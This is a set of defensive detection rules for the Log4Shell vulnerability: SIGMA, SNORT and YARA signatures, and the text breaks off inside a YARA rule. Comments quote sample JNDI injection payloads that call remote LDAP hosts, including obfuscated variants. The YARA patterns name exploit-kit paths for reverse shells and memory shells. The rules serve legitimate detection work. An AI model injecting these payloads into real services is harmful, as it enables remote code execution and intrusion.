SIGMA (SOC Prime) title: Log4j RCE [CVE-2021-44228] Exploitation Detection Patterns (via webserver) status: experimental description: Detects possible Log4j exploitation patterns in user agent header on webserver or proxy logs. author: SOC Prime Team tags: - attack.initial_access - attack.t1190 references: - https://www.randori.com/blog/cve-2021-44228/ - https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/ - https://www-cnblogs-com.translate.goog/yyhuni/p/15088134.html?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://www.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/ - https://github.com/YfryTchsGD/Log4jAttackSurface - https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 - https://github.com/tangxiaofeng7/apache-log4j-poc - https://github.com/apache/logging-log4j2/pull/608 - https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability - https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/ - https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell - https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/ - https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/ - https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/ logsource: category: webserver, proxy detection: selection_base_ua: c-useragent|contains: - 'jndi' #real attack example: ${jndi:ldap://45.XXX.205.XXX:12344/Basic/Command/Base64/XXX==} selection_vars_ua: c-useragent|contains: - 'ldap' - 'rmi' - 'ldaps' - 'dns' - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} - 'upper' selection_base_url: #https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/ c-uri|contains: - 'jndi' selection_vars_url: c-uri|contains: - 'ldap' - 'rmi' - 'ldaps' - 'dns' - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} - 'upper' selection_base_body: #https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/ post-body|contains: - 'jndi' selection_vars_body: post-body|contains: - 'ldap' - 'rmi' - 'ldaps' - 'dns' - 'lower' # ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} - 'upper' condition: (selection_base_ua and selection_vars_ua) or (selection_base_url and selection_vars_url) or (selection_base_body and selection_vars_body) falsepositives: - Unknown level: high SNORT: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;) YARA (https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar): rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1 { meta: description = "Detects IOCs found in Log4Shell incidents that indicate exploitation attempts of CVE-2021-44228" author = "Florian Roth" reference = "https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8" date = "2021-12-12" score = 60 strings: $xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/ condition: 1 of them } rule EXPL_JNDI_Exploit_Patterns_Dec21_1 { meta: description = "Detects JNDI Exploit Kit patterns in files" author = "Florian Roth" reference = "https://github.com/pimps/JNDI-Exploit-Kit" date = "2021-12-12" score = 60 strings: $x01 = "/Basic/Command/Base64/" $x02 = "/Basic/ReverseShell/" $x03 = "/Basic/TomcatMemshell" $x04 = "/Basic/JettyMemshell" $x05 = "/Basic/WeblogicMemshell" $x06 = "/Basic/JBossMemshell" $x07 = "/Basic/WebsphereMemshell" $x08 = "/Basic/SpringMemshell" $x09 = "/Deserialization/URLDNS/" $x10 = "/Deserialization/CommonsCollections1/Dnslog/" $x11 = "/Deserialization/CommonsCollections2/Command/Base64/" $x12 = "/Deserialization/CommonsBeanutils1/ReverseShell/" $x13 = "/Deserialization/Jre8u20/TomcatMemshell" $x14 = "/TomcatBypass/Dnslog/" $x15 = "/TomcatBypass/Command/" $x16 = "/TomcatBypass/ReverseShell/" $x17 = "/TomcatBypass/TomcatMemshell" $x18 = "/TomcatBypass/SpringMemshell" $x19 = "/GroovyBypass/Command/" $x20 = "/WebsphereBypass/Upload/" $fp1 = "